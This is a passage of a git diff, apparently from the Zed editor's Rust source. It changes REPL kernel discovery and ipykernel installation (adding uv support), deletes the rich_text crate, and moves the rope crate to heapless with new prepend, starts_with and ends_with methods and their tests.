IpykernelInstall; @@ -109,11 +110,25 @@ pub fn install_ipykernel_and_assign( let window_handle = window.window_handle(); let install_task = cx.background_spawn(async move { - let output = util::command::new_command(python_path.to_string_lossy().as_ref()) - .args(&["-m", "pip", "install", "ipykernel"]) - .output() - .await - .context("failed to run pip install ipykernel")?; + let output = if is_uv { + util::command::new_command("uv") + .args(&[ + "pip", + "install", + "ipykernel", + "--python", + &python_path.to_string_lossy(), + ]) + .output() + .await + .context("failed to run uv pip install ipykernel")? + } else { + util::command::new_command(python_path.to_string_lossy().as_ref()) + .args(&["-m", "pip", "install", "ipykernel"]) + .output() + .await + .context("failed to run pip install ipykernel")? + }; if output.status.success() { anyhow::Ok(()) @@ -146,6 +161,11 @@ pub fn install_ipykernel_and_assign( window_handle .update(cx, |_, window, cx| { + let store = ReplStore::global(cx); + store.update(cx, |store, cx| { + store.mark_ipykernel_installed(cx, &env_spec); + }); + let updated_spec = KernelSpecification::PythonEnv(PythonEnvKernelSpecification { has_ipykernel: true, @@ -191,6 +211,7 @@ pub fn run( if !store.read(cx).is_enabled() { return Ok(()); } + store.update(cx, |store, cx| store.ensure_kernelspecs(cx)); let editor = editor.upgrade().context("editor was dropped")?; let selected_range = editor @@ -636,12 +657,9 @@ fn language_supported(language: &Arc, cx: &mut App) -> bool { let store = ReplStore::global(cx); let store_read = store.read(cx); - // Since we're just checking for general language support, we only need to look at - // the pure Jupyter kernels - these are all the globally available ones - store_read.pure_jupyter_kernel_specifications().any(|spec| { - // Convert to lowercase for case-insensitive comparison since kernels might report "python" while our language is "Python" - spec.language().as_ref().to_lowercase() == language.name().as_ref().to_lowercase() - }) + store_read + .pure_jupyter_kernel_specifications() + .any(|spec| language.matches_kernel_language(spec.language().as_ref())) } fn get_language(editor: WeakEntity, cx: &mut App) -> Option> { diff --git a/crates/repl/src/repl_sessions_ui.rs b/crates/repl/src/repl_sessions_ui.rs index 1dc2107adde84d4625ffee489805570cd7e5f791..9781382fc85d5da549a65dce2ca06fef4a3bff15 100644 --- a/crates/repl/src/repl_sessions_ui.rs +++ b/crates/repl/src/repl_sessions_ui.rs @@ -204,7 +204,8 @@ impl Render for ReplSessionsPage { fn render(&mut self, _: &mut Window, cx: &mut Context) -> impl IntoElement { let store = ReplStore::global(cx); - let (kernel_specifications, sessions) = store.update(cx, |store, _cx| { + let (kernel_specifications, sessions) = store.update(cx, |store, cx| { + store.ensure_kernelspecs(cx); ( store .pure_jupyter_kernel_specifications() diff --git a/crates/repl/src/repl_settings.rs b/crates/repl/src/repl_settings.rs index 302164a5b360157edceff1b1f2e18f6c6fd7a50b..5fd7623bb71e6446b8cacd6029108e481efc8680 100644 --- a/crates/repl/src/repl_settings.rs +++ b/crates/repl/src/repl_settings.rs @@ -27,11 +27,6 @@ pub struct ReplSettings { /// /// Default: 0 pub output_max_height_lines: usize, - /// Maximum number of columns of output to display before scaling images. - /// Set to 0 to disable output width limits. - /// - /// Default: 0 - pub output_max_width_columns: usize, } impl Settings for ReplSettings { @@ -44,7 +39,6 @@ impl Settings for ReplSettings { inline_output: repl.inline_output.unwrap_or(true), inline_output_max_length: repl.inline_output_max_length.unwrap_or(50), output_max_height_lines: repl.output_max_height_lines.unwrap_or(0), - output_max_width_columns: repl.output_max_width_columns.unwrap_or(0), } } } diff --git a/crates/repl/src/repl_store.rs b/crates/repl/src/repl_store.rs index 1c6ce99c2177260c1b9aaf1733326ddbda85a64f..4c5827b7c0cf881725b2937cc0aef0b7e241f0f3 100644 --- a/crates/repl/src/repl_store.rs +++ b/crates/repl/src/repl_store.rs @@ -8,12 +8,13 @@ use gpui::{App, Context, Entity, EntityId, Global, SharedString, Subscription, T use jupyter_websocket_client::RemoteServer; use language::{Language, LanguageName}; use project::{Fs, Project, ProjectPath, WorktreeId}; +use remote::RemoteConnectionOptions; use settings::{Settings, SettingsStore}; use util::rel_path::RelPath; use crate::kernels::{ - Kernel, list_remote_kernelspecs, local_kernel_specifications, python_env_kernel_specifications, - wsl_kernel_specifications, + Kernel, PythonEnvKernelSpecification, list_remote_kernelspecs, local_kernel_specifications, + python_env_kernel_specifications, wsl_kernel_specifications, }; use crate::{JupyterSettings, KernelSpecification, Session}; @@ -26,10 +27,12 @@ pub struct ReplStore { enabled: bool, sessions: HashMap>, kernel_specifications: Vec, + kernelspecs_initialized: bool, selected_kernel_for_worktree: HashMap, kernel_specifications_for_worktree: HashMap>, active_python_toolchain_for_worktree: HashMap, remote_worktrees: HashSet, + fetching_python_kernelspecs: HashSet, _subscriptions: Vec, } @@ -38,12 +41,6 @@ impl ReplStore { pub(crate) fn init(fs: Arc, cx: &mut App) { let store = cx.new(move |cx| Self::new(fs, cx)); - - #[cfg(not(feature = "test-support"))] - store - .update(cx, |store, cx| store.refresh_kernelspecs(cx)) - .detach_and_log_err(cx); - cx.set_global(GlobalReplStore(store)) } @@ -64,11 +61,13 @@ impl ReplStore { enabled: JupyterSettings::enabled(cx), sessions: HashMap::default(), kernel_specifications: Vec::new(), + kernelspecs_initialized: false, _subscriptions: subscriptions, kernel_specifications_for_worktree: HashMap::default(), selected_kernel_for_worktree: HashMap::default(), active_python_toolchain_for_worktree: HashMap::default(), remote_worktrees: HashSet::default(), + fetching_python_kernelspecs: HashSet::default(), }; this.on_enabled_changed(cx); this @@ -137,14 +136,43 @@ impl ReplStore { cx.notify(); } + pub fn mark_ipykernel_installed( + &mut self, + cx: &mut Context, + spec: &PythonEnvKernelSpecification, + ) { + for specs in self.kernel_specifications_for_worktree.values_mut() { + for kernel_spec in specs.iter_mut() { + if let KernelSpecification::PythonEnv(env_spec) = kernel_spec { + if env_spec == spec { + env_spec.has_ipykernel = true; + } + } + } + } + cx.notify(); + } + pub fn refresh_python_kernelspecs( &mut self, worktree_id: WorktreeId, project: &Entity, cx: &mut Context, ) -> Task> { + if !self.fetching_python_kernelspecs.insert(worktree_id) { + return Task::ready(Ok(())); + } + let is_remote = project.read(cx).is_remote(); - let kernel_specifications = python_env_kernel_specifications(project, worktree_id, cx); + // WSL does require access to global kernel specs, so we only exclude remote worktrees that aren't WSL. + // TODO: a better way to handle WSL vs SSH/remote projects, + let is_wsl_remote = project + .read(cx) + .remote_connection_options(cx) + .map_or(false, |opts| { + matches!(opts, RemoteConnectionOptions::Wsl(_)) + }); + let kernel_specifications_task = python_env_kernel_specifications(project, worktree_id, cx); let active_toolchain = project.read(cx).active_toolchain( ProjectPath { worktree_id, @@ -155,9 +183,15 @@ impl ReplStore { ); cx.spawn(async move |this, cx| { - let kernel_specifications = kernel_specifications - .await - .context("getting python kernelspecs")?; + let kernel_specifications_res = kernel_specifications_task.await; + + this.update(cx, |this, _cx| { + this.fetching_python_kernelspecs.remove(&worktree_id); + }) + .ok(); + + let kernel_specifications = + kernel_specifications_res.context("getting python kernelspecs")?; let active_toolchain_path = active_toolchain.await.map(|toolchain| toolchain.path); @@ -168,7 +202,7 @@ impl ReplStore { this.active_python_toolchain_for_worktree .insert(worktree_id, path); } - if is_remote { + if is_remote && !is_wsl_remote { this.remote_worktrees.insert(worktree_id); } else { this.remote_worktrees.remove(&worktree_id); @@ -207,10 +241,17 @@ impl ReplStore { } } + pub fn ensure_kernelspecs(&mut self, cx: &mut Context) { + if self.kernelspecs_initialized { + return; + } + self.kernelspecs_initialized = true; + self.refresh_kernelspecs(cx).detach_and_log_err(cx); + } + pub fn refresh_kernelspecs(&mut self, cx: &mut Context) -> Task> { let local_kernel_specifications = local_kernel_specifications(self.fs.clone()); let wsl_kernel_specifications = wsl_kernel_specifications(cx.background_executor().clone()); - let remote_kernel_specifications = self.get_remote_kernel_specifications(cx); let all_specs = cx.background_spawn(async move { @@ -289,7 +330,6 @@ impl ReplStore { } let language_at_cursor = language_at_cursor?; - let language_name = language_at_cursor.code_fence_block_name().to_lowercase(); // Prefer the recommended (active toolchain) kernel if it has ipykernel if let Some(active_path) = self.active_python_toolchain_path(worktree_id) { @@ -297,7 +337,7 @@ impl ReplStore { .kernel_specifications_for_worktree(worktree_id) .find(|spec| { spec.has_ipykernel() - && spec.language().as_ref().to_lowercase() == language_name + && language_at_cursor.matches_kernel_language(spec.language().as_ref()) && spec.path().as_ref() == active_path.as_ref() }) .cloned(); @@ -312,7 +352,7 @@ impl ReplStore { .find(|spec| { matches!(spec, KernelSpecification::PythonEnv(_)) && spec.has_ipykernel() - && spec.language().as_ref().to_lowercase() == language_name + && language_at_cursor.matches_kernel_language(spec.language().as_ref()) }) .cloned(); if python_env.is_some() { @@ -350,10 +390,10 @@ impl ReplStore { return Some(found_by_name); } - let language_name = language_at_cursor.code_fence_block_name().to_lowercase(); self.kernel_specifications_for_worktree(worktree_id) .find(|spec| { - spec.has_ipykernel() && spec.language().as_ref().to_lowercase() == language_name + spec.has_ipykernel() + && language_at_cursor.matches_kernel_language(spec.language().as_ref()) }) .cloned() } diff --git a/crates/reqwest_client/Cargo.toml b/crates/reqwest_client/Cargo.toml index 41fcd1f5d2f8ca1c78b0a2261a7c48566999e0de..105a3e7df81be5e125477968cf8e8751dfbb9e78 100644 --- a/crates/reqwest_client/Cargo.toml +++ b/crates/reqwest_client/Cargo.toml @@ -31,4 +31,3 @@ gpui_util.workspace = true http_client_tls.workspace = true [dev-dependencies] -gpui.workspace = true diff --git a/crates/rich_text/Cargo.toml b/crates/rich_text/Cargo.toml deleted file mode 100644 index 17bd8d2a4b8977b2bf0079b84dc8f27a9999974b..0000000000000000000000000000000000000000 --- a/crates/rich_text/Cargo.toml +++ /dev/null @@ -1,29 +0,0 @@ -[package] -name = "rich_text" -version = "0.1.0" -edition.workspace = true -publish.workspace = true -license = "GPL-3.0-or-later" - -[lints] -workspace = true - -[lib] -path = "src/rich_text.rs" -doctest = false - -[features] -test-support = [ - "gpui/test-support", - "util/test-support", -] - -[dependencies] -futures.workspace = true -gpui.workspace = true -language.workspace = true -linkify.workspace = true -pulldown-cmark.workspace = true -theme.workspace = true -ui.workspace = true -util.workspace = true diff --git a/crates/rich_text/src/rich_text.rs b/crates/rich_text/src/rich_text.rs deleted file mode 100644 index 2af9988f032c5dc9651e1da6e8c3b52c6c668866..0000000000000000000000000000000000000000 --- a/crates/rich_text/src/rich_text.rs +++ /dev/null @@ -1,418 +0,0 @@ -use futures::FutureExt; -use gpui::{ - AnyElement, AnyView, App, ElementId, FontStyle, FontWeight, HighlightStyle, InteractiveText, - IntoElement, SharedString, StrikethroughStyle, StyledText, UnderlineStyle, Window, -}; -use language::{HighlightId, Language, LanguageRegistry}; -use std::{ops::Range, sync::Arc}; -use theme::ActiveTheme; -use ui::LinkPreview; -use util::RangeExt; - -#[derive(Debug, Clone, PartialEq, Eq)] -pub enum Highlight { - Code, - Id(HighlightId), - InlineCode(bool), - Highlight(HighlightStyle), - Mention, - SelfMention, -} - -impl From for Highlight { - fn from(style: HighlightStyle) -> Self { - Self::Highlight(style) - } -} - -impl From for Highlight { - fn from(style: HighlightId) -> Self { - Self::Id(style) - } -} - -#[derive(Clone, Default)] -pub struct RichText { - pub text: SharedString, - pub highlights: Vec<(Range, Highlight)>, - pub link_ranges: Vec>, - pub link_urls: Arc<[String]>, - - pub custom_ranges: Vec>, - custom_ranges_tooltip_fn: - Option, &mut Window, &mut App) -> Option>>, -} - -/// Allows one to specify extra links to the rendered markdown, which can be used -/// for e.g. mentions. -#[derive(Debug)] -pub struct Mention { - pub range: Range, - pub is_self_mention: bool, -} - -impl RichText { - pub fn new( - block: String, - mentions: &[Mention], - language_registry: &Arc, - ) -> Self { - let mut text = String::new(); - let mut highlights = Vec::new(); - let mut link_ranges = Vec::new(); - let mut link_urls = Vec::new(); - render_markdown_mut( - &block, - mentions, - language_registry, - None, - &mut text, - &mut highlights, - &mut link_ranges, - &mut link_urls, - ); - text.truncate(text.trim_end().len()); - - RichText { - text: SharedString::from(text), - link_urls: link_urls.into(), - link_ranges, - highlights, - custom_ranges: Vec::new(), - custom_ranges_tooltip_fn: None, - } - } - - pub fn set_tooltip_builder_for_custom_ranges( - &mut self, - f: impl Fn(usize, Range, &mut Window, &mut App) -> Option + 'static, - ) { - self.custom_ranges_tooltip_fn = Some(Arc::new(f)); - } - - pub fn element(&self, id: ElementId, window: &mut Window, cx: &mut App) -> AnyElement { - let theme = cx.theme(); - let code_background = theme.colors().surface_background; - - InteractiveText::new( - id, - StyledText::new(self.text.clone()).with_default_highlights( - &window.text_style(), - self.highlights.iter().map(|(range, highlight)| { - ( - range.clone(), - match highlight { - Highlight::Code => HighlightStyle { - background_color: Some(code_background), - ..Default::default() - }, - Highlight::Id(id) => HighlightStyle { - background_color: Some(code_background), - ..id.style(theme.syntax()).unwrap_or_default() - }, - Highlight::InlineCode(link) => { - if *link { - HighlightStyle { - background_color: Some(code_background), - underline: Some(UnderlineStyle { - thickness: 1.0.into(), - ..Default::default() - }), - ..Default::default() - } - } else { - HighlightStyle { - background_color: Some(code_background), - ..Default::default() - } - } - } - Highlight::Highlight(highlight) => *highlight, - Highlight::Mention => HighlightStyle { - font_weight: Some(FontWeight::BOLD), - ..Default::default() - }, - Highlight::SelfMention => HighlightStyle { - font_weight: Some(FontWeight::BOLD), - ..Default::default() - }, - }, - ) - }), - ), - ) - .on_click(self.link_ranges.clone(), { - let link_urls = self.link_urls.clone(); - move |ix, _, cx| { - let url = &link_urls[ix]; - if url.starts_with("http") { - cx.open_url(url); - } - } - }) - .tooltip({ - let link_ranges = self.link_ranges.clone(); - let link_urls = self.link_urls.clone(); - let custom_tooltip_ranges = self.custom_ranges.clone(); - let custom_tooltip_fn = self.custom_ranges_tooltip_fn.clone(); - move |idx, window, cx| { - for (ix, range) in link_ranges.iter().enumerate() { - if range.contains(&idx) { - return Some(LinkPreview::new(&link_urls[ix], cx)); - } - } - for range in &custom_tooltip_ranges { - if range.contains(&idx) - && let Some(f) = &custom_tooltip_fn - { - return f(idx, range.clone(), window, cx); - } - } - None - } - }) - .into_any_element() - } -} - -pub fn render_markdown_mut( - block: &str, - mut mentions: &[Mention], - language_registry: &Arc, - language: Option<&Arc>, - text: &mut String, - highlights: &mut Vec<(Range, Highlight)>, - link_ranges: &mut Vec>, - link_urls: &mut Vec, -) { - use pulldown_cmark::{CodeBlockKind, Event, Options, Parser, Tag, TagEnd}; - - let mut bold_depth = 0; - let mut italic_depth = 0; - let mut strikethrough_depth = 0; - let mut link_url = None; - let mut current_language = None; - let mut list_stack = Vec::new(); - - let mut options = Options::all(); - options.remove(pulldown_cmark::Options::ENABLE_DEFINITION_LIST); - - for (event, source_range) in Parser::new_ext(block, options).into_offset_iter() { - let prev_len = text.len(); - match event { - Event::Text(t) => { - if let Some(language) = ¤t_language { - render_code(text, highlights, t.as_ref(), language); - } else { - while let Some(mention) = mentions.first() { - if !source_range.contains_inclusive(&mention.range) { - break; - } - mentions = &mentions[1..]; - let range = (prev_len + mention.range.start - source_range.start) - ..(prev_len + mention.range.end - source_range.start); - highlights.push(( - range.clone(), - if mention.is_self_mention { - Highlight::SelfMention - } else { - Highlight::Mention - }, - )); - } - - text.push_str(t.as_ref()); - let mut style = HighlightStyle::default(); - if bold_depth > 0 { - style.font_weight = Some(FontWeight::BOLD); - } - if italic_depth > 0 { - style.font_style = Some(FontStyle::Italic); - } - if strikethrough_depth > 0 { - style.strikethrough = Some(StrikethroughStyle { - thickness: 1.0.into(), - ..Default::default() - }); - } - let last_run_len = if let Some(link_url) = link_url.clone() { - link_ranges.push(prev_len..text.len()); - link_urls.push(link_url); - style.underline = Some(UnderlineStyle { - thickness: 1.0.into(), - ..Default::default() - }); - prev_len - } else { - // Manually scan for links - let mut finder = linkify::LinkFinder::new(); - finder.kinds(&[linkify::LinkKind::Url]); - let mut last_link_len = prev_len; - for link in finder.links(&t) { - let start = link.start(); - let end = link.end(); - let range = (prev_len + start)..(prev_len + end); - link_ranges.push(range.clone()); - link_urls.push(link.as_str().to_string()); - - // If there is a style before we match a link, we have to add this to the highlighted ranges - if style != HighlightStyle::default() && last_link_len < link.start() { - highlights.push(( - last_link_len..link.start(), - Highlight::Highlight(style), - )); - } - - highlights.push(( - range, - Highlight::Highlight(HighlightStyle { - underline: Some(UnderlineStyle { - thickness: 1.0.into(), - ..Default::default() - }), - ..style - }), - )); - - last_link_len = end; - } - last_link_len - }; - - if style != HighlightStyle::default() && last_run_len < text.len() { - let mut new_highlight = true; - if let Some((last_range, last_style)) = highlights.last_mut() - && last_range.end == last_run_len - && last_style == &Highlight::Highlight(style) - { - last_range.end = text.len(); - new_highlight = false; - } - if new_highlight { - highlights - .push((last_run_len..text.len(), Highlight::Highlight(style))); - } - } - } - } - Event::Code(t) => { - text.push_str(t.as_ref()); - let is_link = link_url.is_some(); - - if let Some(link_url) = link_url.clone() { - link_ranges.push(prev_len..text.len()); - link_urls.push(link_url); - } - - highlights.push((prev_len..text.len(), Highlight::InlineCode(is_link))) - } - Event::Start(tag) => match tag { - Tag::Paragraph => new_paragraph(text, &mut list_stack), - Tag::Heading { .. } => { - new_paragraph(text, &mut list_stack); - bold_depth += 1; - } - Tag::CodeBlock(kind) => { - new_paragraph(text, &mut list_stack); - current_language = if let CodeBlockKind::Fenced(language) = kind { - language_registry - .language_for_name(language.as_ref()) - .now_or_never() - .and_then(Result::ok) - } else { - language.cloned() - } - } - Tag::Emphasis => italic_depth += 1, - Tag::Strong => bold_depth += 1, - Tag::Strikethrough => strikethrough_depth += 1, - Tag::Link { dest_url, .. } => link_url = Some(dest_url.to_string()), - Tag::List(number) => { - list_stack.push((number, false)); - } - Tag::Item => { - let len = list_stack.len(); - if let Some((list_number, has_content)) = list_stack.last_mut() { - *has_content = false; - if !text.is_empty() && !text.ends_with('\n') { - text.push('\n'); - } - for _ in 0..len - 1 { - text.push_str(" "); - } - if let Some(number) = list_number { - text.push_str(&format!("{}. ", number)); - *number += 1; - *has_content = false; - } else { - text.push_str("- "); - } - } - } - _ => {} - }, - Event::End(tag) => match tag { - TagEnd::Heading(_) => bold_depth -= 1, - TagEnd::CodeBlock => current_language = None, - TagEnd::Emphasis => italic_depth -= 1, - TagEnd::Strong => bold_depth -= 1, - TagEnd::Strikethrough => strikethrough_depth -= 1, - TagEnd::Link => link_url = None, - TagEnd::List(_) => drop(list_stack.pop()), - _ => {} - }, - Event::HardBreak => text.push('\n'), - Event::SoftBreak => text.push('\n'), - _ => {} - } - } -} - -pub fn render_code( - text: &mut String, - highlights: &mut Vec<(Range, Highlight)>, - content: &str, - language: &Arc, -) { - let prev_len = text.len(); - text.push_str(content); - let mut offset = 0; - for (range, highlight_id) in language.highlight_text(&content.into(), 0..content.len()) { - if range.start > offset { - highlights.push((prev_len + offset..prev_len + range.start, Highlight::Code)); - } - highlights.push(( - prev_len + range.start..prev_len + range.end, - Highlight::Id(highlight_id), - )); - offset = range.end; - } - if offset < content.len() { - highlights.push((prev_len + offset..prev_len + content.len(), Highlight::Code)); - } -} - -pub fn new_paragraph(text: &mut String, list_stack: &mut Vec<(Option, bool)>) { - let mut is_subsequent_paragraph_of_list = false; - if let Some((_, has_content)) = list_stack.last_mut() { - if *has_content { - is_subsequent_paragraph_of_list = true; - } else { - *has_content = true; - return; - } - } - - if !text.is_empty() { - if !text.ends_with('\n') { - text.push('\n'); - } - text.push('\n'); - } - for _ in 0..list_stack.len().saturating_sub(1) { - text.push_str(" "); - } - if is_subsequent_paragraph_of_list { - text.push_str(" "); - } -} diff --git a/crates/rope/Cargo.toml b/crates/rope/Cargo.toml index 9f0fc2be8a021a4cd43679beefb18a3567452dde..a4273c8abff1a4a3bc9b08a72f0c405f3195c75e 100644 --- a/crates/rope/Cargo.toml +++ b/crates/rope/Cargo.toml @@ -12,7 +12,7 @@ workspace = true path = "src/rope.rs" [dependencies] -arrayvec = "0.7.1" +heapless.workspace = true log.workspace = true rayon.workspace = true sum_tree.workspace = true diff --git a/crates/rope/src/chunk.rs b/crates/rope/src/chunk.rs index e5a3ed045a7e44e2208941e908718bdf7ee5b00a..96fc743a33190da9c59c029ace9997b1f9407e63 100644 --- a/crates/rope/src/chunk.rs +++ b/crates/rope/src/chunk.rs @@ -1,5 +1,5 @@ use crate::{OffsetUtf16, Point, PointUtf16, TextSummary, Unclipped}; -use arrayvec::ArrayString; +use heapless::String as ArrayString; use std::{cmp, ops::Range}; use sum_tree::Bias; use unicode_segmentation::GraphemeCursor; @@ -29,7 +29,7 @@ pub struct Chunk { newlines: Bitmap, /// If bit[i] is set, then the character at index i is an ascii tab. tabs: Bitmap, - pub text: ArrayString, + pub text: ArrayString, } #[inline(always)] @@ -47,7 +47,11 @@ impl Chunk { #[inline(always)] pub fn new(text: &str) -> Self { - let text = ArrayString::from(text).unwrap(); + let text = { + let mut buf = ArrayString::new(); + buf.push_str(text).unwrap(); + buf + }; const CHUNK_SIZE: usize = 8; @@ -102,6 +106,11 @@ impl Chunk { self.append(Chunk::new(text).as_slice()); } + #[inline(always)] + pub fn prepend_str(&mut self, text: &str) { + self.prepend(Chunk::new(text).as_slice()); + } + #[inline(always)] pub fn append(&mut self, slice: ChunkSlice) { if slice.is_empty() { @@ -113,7 +122,29 @@ impl Chunk { self.chars_utf16 |= slice.chars_utf16 << base_ix; self.newlines |= slice.newlines << base_ix; self.tabs |= slice.tabs << base_ix; - self.text.push_str(slice.text); + self.text.push_str(slice.text).unwrap(); + } + + #[inline(always)] + pub fn prepend(&mut self, slice: ChunkSlice) { + if slice.is_empty() { + return; + } + if self.text.is_empty() { + *self = Chunk::new(slice.text); + return; + } + + let shift = slice.text.len(); + self.chars = slice.chars | (self.chars << shift); + self.chars_utf16 = slice.chars_utf16 | (self.chars_utf16 << shift); + self.newlines = slice.newlines | (self.newlines << shift); + self.tabs = slice.tabs | (self.tabs << shift); + + let mut new_text = ArrayString::::new(); + new_text.push_str(slice.text).unwrap(); + new_text.push_str(&self.text).unwrap(); + self.text = new_text; } #[inline(always)] @@ -890,6 +921,24 @@ mod tests { verify_chunk(chunk1.as_slice(), &(str1 + &str2[start_offset..end_offset])); } + #[gpui::test(iterations = 1000)] + fn test_prepend_random_strings(mut rng: StdRng) { + let len1 = rng.random_range(0..=MAX_BASE); + let len2 = rng.random_range(0..=MAX_BASE).saturating_sub(len1); + let str1 = random_string_with_utf8_len(&mut rng, len1); + let str2 = random_string_with_utf8_len(&mut rng, len2); + let mut chunk1 = Chunk::new(&str1); + let chunk2 = Chunk::new(&str2); + let char_offsets = char_offsets_with_end(&str2); + let start_index = rng.random_range(0..char_offsets.len()); + let start_offset = char_offsets[start_index]; + let end_offset = char_offsets[rng.random_range(start_index..char_offsets.len())]; + let slice = chunk2.slice(start_offset..end_offset); + let prefix_text = &str2[start_offset..end_offset]; + chunk1.prepend(slice); + verify_chunk(chunk1.as_slice(), &(prefix_text.to_owned() + &str1)); + } + /// Return the byte offsets for each character in a string. /// /// These are valid offsets to split the string. diff --git a/crates/rope/src/rope.rs b/crates/rope/src/rope.rs index 7ab273be7bfa3fa84a608c69174cfcc6a038eac5..d6a4db3396c287e51dceddbc2f67fc0a40cf2c5b 100644 --- a/crates/rope/src/rope.rs +++ b/crates/rope/src/rope.rs @@ -4,7 +4,7 @@ mod point; mod point_utf16; mod unclipped; -use arrayvec::ArrayVec; +use heapless::Vec as ArrayVec; use rayon::iter::{IntoParallelIterator, ParallelIterator as _}; use std::{ cmp, fmt, io, mem, @@ -167,6 +167,11 @@ impl Rope { (), ); + if text.is_empty() { + self.check_invariants(); + return; + } + #[cfg(all(test, not(rust_analyzer)))] const NUM_CHUNKS: usize = 16; #[cfg(not(all(test, not(rust_analyzer))))] @@ -179,7 +184,7 @@ impl Rope { return self.push_large(text); } // 16 is enough as otherwise we will hit the branch above - let mut new_chunks = ArrayVec::<_, NUM_CHUNKS>::new(); + let mut new_chunks = ArrayVec::<_, NUM_CHUNKS, u8>::new(); while !text.is_empty() { let mut split_ix = cmp::min(chunk::MAX_BASE, text.len()); @@ -187,7 +192,7 @@ impl Rope { split_ix -= 1; } let (chunk, remainder) = text.split_at(split_ix); - new_chunks.push(chunk); + new_chunks.push(chunk).unwrap(); text = remainder; } self.chunks @@ -269,6 +274,23 @@ impl Rope { } pub fn push_front(&mut self, text: &str) { + if text.is_empty() { + return; + } + if self.is_empty() { + self.push(text); + return; + } + if self + .chunks + .first() + .is_some_and(|c| c.text.len() + text.len() <= chunk::MAX_BASE) + { + self.chunks + .update_first(|first_chunk| first_chunk.prepend_str(text), ()); + self.check_invariants(); + return; + } let suffix = mem::replace(self, Rope::from(text)); self.append(suffix); } @@ -548,6 +570,48 @@ impl Rope { } } + pub fn starts_with(&self, pattern: &str) -> bool { + if pattern.len() > self.len() { + return false; + } + let mut remaining = pattern; + for chunk in self.chunks_in_range(0..self.len()) { + let Some(chunk) = chunk.get(..remaining.len().min(chunk.len())) else { + return false; + }; + if remaining.starts_with(chunk) { + remaining = &remaining[chunk.len()..]; + if remaining.is_empty() { + return true; + } + } else { + return false; + } + } + remaining.is_empty() + } + + pub fn ends_with(&self, pattern: &str) -> bool { + if pattern.len() > self.len() { + return false; + } + let mut remaining = pattern; + for chunk in self.reversed_chunks_in_range(0..self.len()) { + let Some(chunk) = chunk.get(chunk.len() - remaining.len().min(chunk.len())..) else { + return false; + }; + if remaining.ends_with(chunk) { + remaining = &remaining[..remaining.len() - chunk.len()]; + if remaining.is_empty() { + return true; + } + } else { + return false; + } + } + remaining.is_empty() + } + pub fn line_len(&self, row: u32) -> u32 { self.clip_point(Point::new(row, u32::MAX), Bias::Left) .column @@ -629,19 +693,32 @@ impl<'a> Cursor<'a> { } pub fn seek_forward(&mut self, end_offset: usize) { - debug_assert!(end_offset >= self.offset); + assert!( + end_offset >= self.offset, + "cannot seek backward from {} to {}", + self.offset, + end_offset + ); + assert!( + end_offset <= self.rope.len(), + "cannot summarize past end of rope" + ); self.chunks.seek_forward(&end_offset, Bias::Right); self.offset = end_offset; } pub fn slice(&mut self, end_offset: usize) -> Rope { - debug_assert!( + assert!( end_offset >= self.offset, - "cannot slice backwards from {} to {}", + "cannot slice backward from {} to {}", self.offset, end_offset ); + assert!( + end_offset <= self.rope.len(), + "cannot summarize past end of rope" + ); let mut slice = Rope::new(); if let Some(start_chunk) = self.chunks.item() { @@ -666,7 +743,16 @@ impl<'a> Cursor<'a> { } pub fn summary(&mut self, end_offset: usize) -> D { - debug_assert!(end_offset >= self.offset); + assert!( + end_offset >= self.offset, + "cannot summarize backward from {} to {}", + self.offset, + end_offset + ); + assert!( + end_offset <= self.rope.len(), + "cannot summarize past end of rope" + ); let mut summary = D::zero(()); if let Some(start_chunk) = self.chunks.item() { @@ -2168,6 +2254,74 @@ mod tests { assert!(!rope.reversed_chunks_in_range(0..0).equals_str("foo")); } + #[test] + fn test_starts_with() { + let text = "Hello, world! 🌍🌎🌏"; + let rope = Rope::from(text); + + assert!(rope.starts_with("")); + assert!(rope.starts_with("H")); + assert!(rope.starts_with("Hello")); + assert!(rope.starts_with("Hello, world! 🌍🌎🌏")); + assert!(!rope.starts_with("ello")); + assert!(!rope.starts_with("Hello, world! 🌍🌎🌏!")); + + let empty_rope = Rope::from(""); + assert!(empty_rope.starts_with("")); + assert!(!empty_rope.starts_with("a")); + } + + #[test] + fn test_ends_with() { + let text = "Hello, world! 🌍🌎🌏"; + let rope = Rope::from(text); + + assert!(rope.ends_with("")); + assert!(rope.ends_with("🌏")); + assert!(rope.ends_with("🌍🌎🌏")); + assert!(rope.ends_with("Hello, world! 🌍🌎🌏")); + assert!(!rope.ends_with("🌎")); + assert!(!rope.ends_with("!Hello, world! 🌍🌎🌏")); + + let empty_rope = Rope::from(""); + assert!(empty_rope.ends_with("")); + assert!(!empty_rope.ends_with("a")); + } + + #[test] + fn test_starts_with_ends_with_random() { + let mut rng = StdRng::seed_from_u64(0); + for _ in 0..100 { + let len = rng.random_range(0..100); + let text: String = RandomCharIter::new(&mut rng).take(len).collect(); + let rope = Rope::from(text.as_str()); + + for _ in 0..10 { + let start = rng.random_range(0..=text.len()); + let start = text.ceil_char_boundary(start); + let end = rng.random_range(start..=text.len()); + let end = text.ceil_char_boundary(end); + let prefix = &text[..end]; + let suffix = &text[start..]; + + assert_eq!( + rope.starts_with(prefix), + text.starts_with(prefix), + "starts_with mismatch for {:?} in {:?}", + prefix, + text + ); + assert_eq!( + rope.ends_with(suffix), + text.ends_with(suffix), + "ends_with mismatch for {:?} in {:?}", + suffix, + text + ); + } + } + } + #[test] fn test_is_char_boundary() { let fixture = "地"; @@ -2229,6 +2383,119 @@ mod tests { } } + #[test] + fn test_push_front_empty_text_on_empty_rope() { + let mut rope = Rope::new(); + rope.push_front(""); + assert_eq!(rope.text(), ""); + assert_eq!(rope.len(), 0); + } + + #[test] + fn test_push_front_empty_text_on_nonempty_rope() { + let mut rope = Rope::from("hello"); + rope.push_front(""); + assert_eq!(rope.text(), "hello"); + } + + #[test] + fn test_push_front_on_empty_rope() { + let mut rope = Rope::new(); + rope.push_front("hello"); + assert_eq!(rope.text(), "hello"); + assert_eq!(rope.len(), 5); + assert_eq!(rope.max_point(), Point::new(0, 5)); + } + + #[test] + fn test_push_front_single_space() { + let mut rope = Rope::from("hint"); + rope.push_front(" "); + assert_eq!(rope.text(), " hint"); + assert_eq!(rope.len(), 5); + } + + #[gpui::test(iterations = 50)] + fn test_push_front_random(mut rng: StdRng) { + let initial_len = rng.random_range(0..=64); + let initial_text: String = RandomCharIter::new(&mut rng).take(initial_len).collect(); + let mut rope = Rope::from(initial_text.as_str()); + + let mut expected = initial_text; + + for _ in 0..rng.random_range(1..=10) { + let prefix_len = rng.random_range(0..=32); + let prefix: String = RandomCharIter::new(&mut rng).take(prefix_len).collect(); + + rope.push_front(&prefix); + expected.insert_str(0, &prefix); + + assert_eq!( + rope.text(), + expected, + "text mismatch after push_front({:?})", + prefix + ); + 